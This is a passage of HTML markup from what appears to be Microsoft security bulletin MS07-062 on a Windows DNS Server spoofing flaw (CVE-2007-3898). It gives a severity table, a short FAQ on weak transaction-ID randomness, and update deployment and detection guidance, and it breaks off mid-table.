language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s3l1-E4G"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;table class="dataTable" id="EAH" cellpadding="0" cellspacing="0" width="93%"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td class="tableHeader" colspan="3"&gt;Vulnerability Severity Rating and Maximum Security Impact by Affected Software&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEEH" width="50%"&gt;Affected Software&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEIH" width="30%"&gt;DNS Spoofing Attack Vulnerability – CVE-2007-3898&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEMH" style="border-right: 1px solid rgb(204, 204, 204);" width="19%"&gt;Aggregate Severity Rating&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Microsoft Windows 2000 Server Service Pack 4&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Important&lt;/b&gt;&lt;br /&gt;Spoofing&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Important&lt;/b&gt;&lt;br /&gt;Spoofing&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Important&lt;/b&gt;&lt;br /&gt;Spoofing&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Important&lt;/b&gt;&lt;br /&gt;Spoofing&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Important&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E4G"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#E4G"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="ECBAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 6px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='3l1-ECBAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s3l1-ECBAC')"&gt;&lt;img id="is3l1-ECBAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h3&gt;&lt;a href="javascript:Toggle('s3l1-ECBAC')" style="text-decoration: none;"&gt;DNS Spoofing Attack Vulnerability – CVE-2007-3898&lt;/a&gt;&lt;/h3&gt;&lt;a href="javascript:Toggle('s3l1-ECBAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s3l1-ECBAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;A spoofing vulnerability exists in Windows DNS Servers. The vulnerability could allow non-privileged users to send malicious responses to DNS requests, thereby spoofing or redirecting Internet traffic from legitimate locations.&lt;/p&gt;&lt;p&gt;To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see &lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3898"&gt;CVE-2007-3898&lt;/a&gt;.&lt;/p&gt;&lt;a name="EMBAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='3l2-EMBAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s3l2-EMBAC')"&gt;&lt;img id="is3l2-EMBAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h4&gt;&lt;a href="javascript:Toggle('s3l2-EMBAC')" style="text-decoration: none;"&gt;Mitigating Factors for DNS Spoofing Attack Vulnerability – CVE-2007-3898&lt;/a&gt;&lt;/h4&gt;&lt;a href="javascript:Toggle('s3l2-EMBAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s3l2-EMBAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. Microsoft has not identified any mitigations for this vulnerability.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EMBAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EMBAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EQBAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='3l2-EQBAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s3l2-EQBAC')"&gt;&lt;img id="is3l2-EQBAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h4&gt;&lt;a href="javascript:Toggle('s3l2-EQBAC')" style="text-decoration: none;"&gt;Workarounds for DNS Spoofing Attack Vulnerability – CVE-2007-3898&lt;/a&gt;&lt;/h4&gt;&lt;a href="javascript:Toggle('s3l2-EQBAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s3l2-EQBAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has not identified any workarounds for this vulnerability.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EQBAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EQBAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EUBAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='3l2-EUBAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s3l2-EUBAC')"&gt;&lt;img id="is3l2-EUBAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h4&gt;&lt;a href="javascript:Toggle('s3l2-EUBAC')" style="text-decoration: none;"&gt;FAQ for DNS Spoofing Attack Vulnerability – CVE-2007-3898&lt;/a&gt;&lt;/h4&gt;&lt;a href="javascript:Toggle('s3l2-EUBAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s3l2-EUBAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;What is the scope of the vulnerability? &lt;/b&gt;&lt;br /&gt;A spoofing vulnerability exists in Windows DNS Severs. An attacker who successfully exploited this vulnerability could impersonate a legitimate address.&lt;/p&gt;&lt;p&gt;&lt;b&gt;What causes the vulnerability? &lt;/b&gt;&lt;br /&gt;The Windows DNS Server service doesn’t provide enough entropy in its random choice of transaction values when it sends out queries to upstream DNS servers.&lt;/p&gt;&lt;p&gt;&lt;b&gt;What might an attacker use the vulnerability to do? &lt;/b&gt;&lt;br /&gt;An attacker who successfully exploited this vulnerability could gain information about the DNS server’s transaction IDs, and use that information to send malicious responses to DNS requests, thus redirecting Internet traffic from legitimate locations to an address of the attacker’s choice.&lt;/p&gt;&lt;p&gt;&lt;b&gt;How could an attacker exploit the vulnerability? &lt;/b&gt;&lt;br /&gt;An attacker who successfully exploited this vulnerability could respond to a DNS query with false or misleading information, thereby redirecting Internet traffic from legitimate locations.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Could the vulnerability be exploited over the Internet? &lt;/b&gt;&lt;br /&gt;Yes, an attacker could exploit this vulnerability over the Internet by sending specific responses to an Internet-facing DNS server that is performing recursive lookups.&lt;/p&gt;&lt;p&gt;&lt;b&gt;What systems are primarily at risk from the vulnerability? &lt;/b&gt;&lt;br /&gt;This vulnerability applies to Windows DNS servers that perform recursive lookups. For more information on recursive queries, please refer to the Technet article on &lt;a href="http://technet2.microsoft.com/windowsserver/en/library/0bcd97e6-b75d-48ce-83ca-bf470573ebdc1033.mspx?mfr=true"&gt;How DNS query works&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;What does the update do? &lt;/b&gt;&lt;br /&gt;The update removes this vulnerability by increasing the randomness of the transaction IDs in recursive DNS server communications.&lt;/p&gt;&lt;p&gt;&lt;b&gt;When this security bulletin was issued, had this vulnerability been publicly disclosed? &lt;/b&gt;&lt;br /&gt;No. Microsoft received information about this vulnerability through responsible disclosure.&lt;/p&gt;&lt;p&gt;&lt;b&gt;When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? &lt;/b&gt;&lt;br /&gt;No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EUBAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EUBAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ECBAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ECBAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2 class="extra"&gt;Update Information&lt;/h2&gt;&lt;div class="expandoIndent" style="margin-bottom: 15px;"&gt;&lt;a name="EKDAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 6px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l1-EKDAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l1-EKDAC')"&gt;&lt;img id="is4l1-EKDAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h3&gt;&lt;a href="javascript:Toggle('s4l1-EKDAC')" style="text-decoration: none;"&gt;Detection and Deployment Tools and Guidance&lt;/a&gt;&lt;/h3&gt;&lt;a href="javascript:Toggle('s4l1-EKDAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l1-EKDAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;Manage the software and security updates you need to deploy to the servers, desktop, and mobile computers in your organization. For more information see the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=69903"&gt;TechNet Update Management Center&lt;/a&gt;. The &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21132"&gt;Microsoft TechNet Security Web site&lt;/a&gt; provides additional information about security in Microsoft products.&lt;/p&gt;&lt;p&gt;Security updates are available from &lt;a href="http://go.microsoft.com/fwlink/?LinkID=40747"&gt;Microsoft Update&lt;/a&gt;, &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21130"&gt;Windows Update&lt;/a&gt;, and &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21135"&gt;Office Update&lt;/a&gt;. Security updates are also available from the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21129"&gt;Microsoft Download Center&lt;/a&gt;. You can find them most easily by doing a keyword search for "security update."&lt;/p&gt;&lt;p&gt;Finally, security updates can be downloaded from the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=96155"&gt;Microsoft Update Catalog&lt;/a&gt;. The Microsoft Update Catalog provides a searchable catalog of content made available through Windows Update and Microsoft Update, including security updates, drivers and service packs. By searching using the security bulletin number (such as, “MS07-036”), you can add all of the applicable updates to your basket (including different languages for an update), and download to the folder of your choosing. For more information about the Microsoft Update Catalog, see the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=97900"&gt;Microsoft Update Catalog FAQ&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Detection and Deployment Guidance&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Microsoft has provided detection and deployment guidance for this month’s security updates. This guidance will also help IT professionals understand how they can use various tools to help deploy the security update, such as Windows Update, Microsoft Update, Office Update, the Microsoft Baseline Security Analyzer (MBSA), the Office Detection Tool, Microsoft Systems Management Server (SMS), and the Extended Security Update Inventory Tool. For more information, see &lt;a href="http://support.microsoft.com/kb/910723"&gt;Microsoft Knowledge Base Article 910723&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Microsoft Baseline Security Analyzer&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Microsoft Baseline Security Analyzer (MBSA) allows administrators to scan local and remote systems for missing security updates as well as common security misconfigurations. For more information about MBSA, visit &lt;a href="http://www.microsoft.com/technet/security/tools/mbsahome.mspx"&gt;Microsoft Baseline Security Analyzer&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;The following table provides the MBSA detection summary for this security update.&lt;/p&gt;&lt;table class="dataTable" id="EGFAC" cellpadding="0" cellspacing="0" width="80%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEJFAC" width="86%"&gt;Software&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colENFAC" style="border-right: 1px solid rgb(204, 204, 204);" width="13%"&gt;MBSA 2.0.1&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Microsoft Windows 2000 Server Service Pack 4&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2 &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Windows Server Update Services&lt;/b&gt;&lt;/p&gt;&lt;p&gt;By using Windows Server Update Services (WSUS), administrators can deploy the latest critical updates and security updates for Windows 2000 operating systems and later, Office XP and later, Exchange Server 2003, and SQL Server 2000 to Windows 2000 and later operating systems. For more information about how to deploy this security update using Windows Server Update Services, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=50120"&gt;Windows Server Update Services Web site&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Systems Management Server&lt;/b&gt;&lt;/p&gt;&lt;p&gt;The following table provides the SMS detection and deployment summary for this security update.&lt;/p&gt;&lt;table class="dataTable" id="ETGAC" cellpadding="0" cellspacing="0" width="89%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEWGAC" width="79%"&gt;Product&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE1GAC" width="10%"&gt;SMS 2.0&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE5GAC" style="border-right: 1px solid rgb(204, 204, 204);" width="10%"&gt;SMS 2003&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Microsoft Windows 2000 Server Service Pack 4&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;No&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;No&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;For SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool (SUIT), can be used by SMS to detect security updates. See also &lt;a href="http://technet.microsoft.com/en-us/sms/bb676799.aspx"&gt;Downloads for Systems Management Server 2.0&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;For SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by &lt;a href="http://update.microsoft.com/microsoftupdate"&gt;Microsoft Update&lt;/a&gt; and that are supported by &lt;a href="http://go.microsoft.com/fwlink/?LinkId=50120"&gt;Windows Server Update Services&lt;/a&gt;. For more information about the SMS 2003 ITMU, see &lt;a href="http://technet.microsoft.com/en-us/sms/bb676783.aspx"&gt;SMS 2003 Inventory Tool for Microsoft Updates&lt;/a&gt;. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications. For more information about the Office Inventory Tool and other scanning tools, see &lt;a href="http://technet.microsoft.com/en-us/sms/bb676786.aspx"&gt;SMS 2003 Software Update Scanning Tools&lt;/a&gt;. See also &lt;a href="http://technet.microsoft.com/en-us/sms/bb676766.aspx"&gt;Downloads for Systems Management Server 2003&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;For more information about SMS, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=21158"&gt;SMS Web site&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;For more detailed information, see &lt;a href="http://support.microsoft.com/kb/910723"&gt;Microsoft Knowledge Base Article 910723&lt;/a&gt;: Summary list of monthly detection and deployment guidance articles.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EKDAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EKDAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EHJAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 6px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l1-EHJAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l1-EHJAC')"&gt;&lt;img id="is4l1-EHJAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h3&gt;&lt;a href="javascript:Toggle('s4l1-EHJAC')" style="text-decoration: none;"&gt;Security Update Deployment&lt;/a&gt;&lt;/h3&gt;&lt;a href="javascript:Toggle('s4l1-EHJAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l1-EHJAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;Affected Software&lt;/b&gt;&lt;/p&gt;&lt;p&gt;For information about the specific security update for your affected software, click the appropriate link:&lt;/p&gt;&lt;a name="EOJAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l2-EOJAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l2-EOJAC')"&gt;&lt;img id="is4l2-EOJAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h4&gt;&lt;a href="javascript:Toggle('s4l2-EOJAC')" style="text-decoration: none;"&gt;Microsoft Windows 2000 Server Service Pack 4&lt;/a&gt;&lt;/h4&gt;&lt;a href="javascript:Toggle('s4l2-EOJAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l2-EOJAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;Reference Table&lt;/b&gt;&lt;/p&gt;&lt;p&gt;The following table contains the security update information for this software. You can find additional information in the subsection, &lt;b&gt;Deployment Information&lt;/b&gt;, in this section.&lt;/p&gt;&lt;table class="dataTable" id="EZJAC" cellpadding="0" cellspacing="0" width="91%"&gt;&lt;thead&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p 